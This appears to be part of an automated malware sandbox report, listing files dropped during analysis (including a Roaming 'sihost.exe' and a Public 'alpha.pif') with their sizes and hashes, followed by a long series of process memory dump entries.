a826ed767f793a09164ee75a0e66d776a2a6f3e97d42c62edf6cf4c189fa3b1c334533075083d2d3039acdf9736674436293e28bbbcc07233d422232fc704f5c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1px3j4mb.bsm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\wbhh3b5e\wbhh3b5e.dll

Filesize
3KB

MD5
6a7999fca705ae0a2c3eceb4b0a3ecbc

SHA1
f495d57e85e579e1dfed512cd64303ea8d0512db

SHA256
39435947e5b700a0bafb26ee7d2e061f124ba0808c237c7f7f77e89525887232

SHA512
4fae6678f5b0e31fb1a050b9da5e5f91377cff32de4aae7f2a539cb7542a33ebf163a091f16b15cf41ebd776e559b0b1ac3d96f21fe910d7ef3ab6bc7ccdc800

Download Submit
C:\Users\Admin\AppData\Local\Temp\xnbmalzpudr

Filesize
4KB

MD5
5eb0adc8caec9668be98038cc6c84bc1

SHA1
9342a8c75c41d5d7b8bc9124b2acc99a193cf237

SHA256
bf7f83d5d9d2d2c39f87f2d38f868bbf01f81860484028ae13b722668cbe4af0

SHA512
a4e926d8697516c66811c333a223e327ab28b06e5d8e6684d4b50a9f231addf64917e02ed2f4282a5d40824d5ffd6557ac651e94a9e942e292a939bad4686df2

Download Submit
C:\Users\Admin\AppData\Roaming\sihost.exe

Filesize
1.6MB

MD5
d245c0efade78fbe55c9d537732dc8fb

SHA1
339657894338cfa9ee994e440443d4fc7ef75368

SHA256
860bb4fd3607ebdb177d9732653f9baeff86192cdf7874c5824ab37b9b61013d

SHA512
562e31c22abf83d57785a5506025847e18a652765f4086ebc1c199b751eeb184a85e9d0ec08289fea1b6beeda0b94e2195a46702aa643ba4f3558a4023af2268

Download Submit
C:\Users\Public\alpha.pif

Filesize
231KB

MD5
d0fce3afa6aa1d58ce9fa336cc2b675b

SHA1
4048488de6ba4bfef9edf103755519f1f762668f

SHA256
4d89fc34d5f0f9babd022271c585a9477bf41e834e46b991deaa0530fdb25e22

SHA512
80e127ef81752cd50f9ea2d662dc4d3bf8db8d29680e75fa5fc406ca22cafa5c4d89ef2eac65b486413d3cdd57a2c12a1cb75f65d1e312a717d262265736d1c2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wbhh3b5e\CSCBA36A8D0D10F4FCC8D9E605548B18BF.TMP

Filesize
652B

MD5
6e1a6455b88ae45fab13071221d69132

SHA1
401866ca48a43683b9ed71dcd7a489c528400449

SHA256
98620b812c7fe39e38e157797e7f95319bf5fa2aabde86f333efd0e3e400e767

SHA512
45ff98a6fdf36f5f47079af6d252ac39040723c4eec0c1437c88b9e7fd114a079c950ed26b1020fb1ab01b89e75b0bf03a1abff3890f8eefd059bf45145890bc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wbhh3b5e\wbhh3b5e.0.cs

Filesize
485B

MD5
74f03e78d7b73ad6aa4709e6695db6c2

SHA1
14fc151424d082da9dc8c6310d08ff28b6657686

SHA256
53b979b096d502e2525526211f57212442a0a9bdfd49e14b695541cdfe37d969

SHA512
9b58cdd28852e1bb63d88cb84473175e4e94f81525b3135e0d063d730b8c6c5561f1d1d9b36d2dde8197dbfa185e75bf57d9d95abd39d5e48cceb2e0e2d88e55

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wbhh3b5e\wbhh3b5e.cmdline

Filesize
369B

MD5
0368bae9f1ba47b6fe3406c90a003d62

SHA1
eb2adab5710221c0ea81f64eeb88934e0cd0cea4

SHA256
b4da5855fc0a343714ed7d8adbdc5a6493fb56e1783a35d9fa272f3e416191b1

SHA512
f155728d18be60984e4a35b16e9214f7605523488d5cc56841c5d2813839fa4203bd23c244a8df93d14732fd330bee3eb9cf1e745b92181842a3bf50faeeba84

Download Submit
memory/1316-126-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-94-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-86-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-87-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-88-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-89-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-82-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-90-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-91-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-81-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-92-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-84-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-85-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-98-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-137-0x0000000000400000-0x00000000005A3000-memory.dmp

Filesize
1.6MB

Download
memory/1316-101-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-102-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-103-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-107-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-112-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-93-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-117-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-119-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-96-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-97-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-122-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-127-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-78-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-79-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-83-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-95-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-116-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-128-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-99-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-133-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-141-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-140-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-139-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-138-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-136-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-135-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-134-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-132-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-131-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-130-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-129-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-125-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-124-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-123-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-121-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-120-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-118-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-115-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-113-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-114-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-111-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-110-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-109-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-108-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-106-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-105-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-104-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/1316-100-0x0000000002A10000-0x0000000003A10000-memory.dmp

Filesize
16.0MB

Download
memory/4976-20-0x000000006DF20000-0x000000006DF6C000-memory.dmp

Filesize
304KB

Download
memory/4976-19-0x00000000075F0000-0x0000000007622000-memory.dmp

Filesize
200KB

Download
memory/4976-16-0x0000000005E60000-0x00000000061B4000-memory.dmp

Filesize
3.3MB

Download
memory/4976-77-0x0000000071660000-0x0000000071E10000-memory.dmp

Filesize
7.7MB

Download
memory/4976-0-0x000000007166E000-0x000000007166F000-memory.dmp

Filesize
4KB

Download
memory/4976-18-0x0000000006460000-0x00000000064AC000-memory.dmp

Filesize
304KB

Download
memory/4976-67-0x0000000008A40000-0x0000000008FE4000-memory.dmp

Filesize
5.6MB

Download
memory/4976-66-0x0000000007CA0000-0x0000000007CC2000-memory.dmp

Filesize
136KB

Download
memory/4976-65-0x0000000071660000-0x0000000071E10000-memory.dmp

Filesize
7.7MB

Download
memory/4976-64-0x0000000071660000-0x0000000071E10000-memory.dmp

Filesize
7.7MB

Download
memory/4976-44-0x00000000079E0000-0x00000000079E8000-memory.dmp

Filesize
32KB

Download
memory/4976-63-0x000000007166E000-0x000000007166F000-memory.dmp

Filesize
4KB

Download
memory/4976-17-0x0000000006420000-0x000000000643E000-memory.dmp

Filesize
120KB

Download
memory/4976-32-0x0000000006A20000-0x0000000006A3E000-memory.dmp

Filesize
120KB

Download
memory/4976-57-0x00000000079E0000-0x00000000079E8000-memory.dmp

Filesize
32KB

Download
memory/4976-21-0x0000000071660000-0x0000000071E10000-memory.dmp

Filesize
7.7MB

Download
memory/4976-6-0x0000000005DF0000-0x0000000005E56000-memory.dmp

Filesize
408KB

Download
memory/4976-5-0x0000000005D80000-0x0000000005DE6000-memory.dmp

Filesize
408KB

Download
memory/4976-33-0x00000000076E0000-0x0000000007783000-memory.dmp

Filesize
652KB

Download
memory/4976-43-0x00000000079F0000-0x0000000007A0A000-memory.dmp

Filesize
104KB

Download
memory/4976-42-0x00000000079B0000-0x00000000079C4000-memory.dmp

Filesize
80KB

Download
memory/4976-41-0x00000000079A0000-0x00000000079AE000-memory.dmp

Filesize
56KB

Download
memory/4976-40-0x0000000007970000-0x0000000007981000-memory.dmp

Filesize
68KB

Download
memory/4976-39-0x0000000007A10000-0x0000000007AA6000-memory.dmp

Filesize
600KB

Download
memory/4976-38-0x00000000077F0000-0x00000000077FA000-memory.dmp

Filesize
40KB

Download
memory/4976-35-0x0000000007E10000-0x000000000848A000-memory.dmp

Filesize
6.5MB

Download
memory/4976-37-0x0000000007790000-0x00000000077AA000-memory.dmp

Filesize
104KB

Download
memory/4976-36-0x0000000071660000-0x0000000071E10000-memory.dmp

Filesize
7.7MB

Download
memory/4976-22-0x000000006E0C0000-0x000000006E414000-memory.dmp

Filesize
3.3MB

Download
memory/4976-34-0x0000000071660000-0x0000000071E10000-memory.dmp

Filesize
7.7MB

Download
memory/4976-4-0x0000000005480000-0x00000000054A2000-memory.dmp

Filesize
136KB

Download
memory/4976-3-0x0000000005560000-0x0000000005B88000-memory.dmp

Filesize
6.2MB

Download
memory/4976-2-0x0000000071660000-0x0000000071E10000-memory.dmp

Filesize
7.7MB

Download
memory/4976-1-0x0000000002E40000-0x0000000002E76000-memory.dmp

Filesize
216KB

Download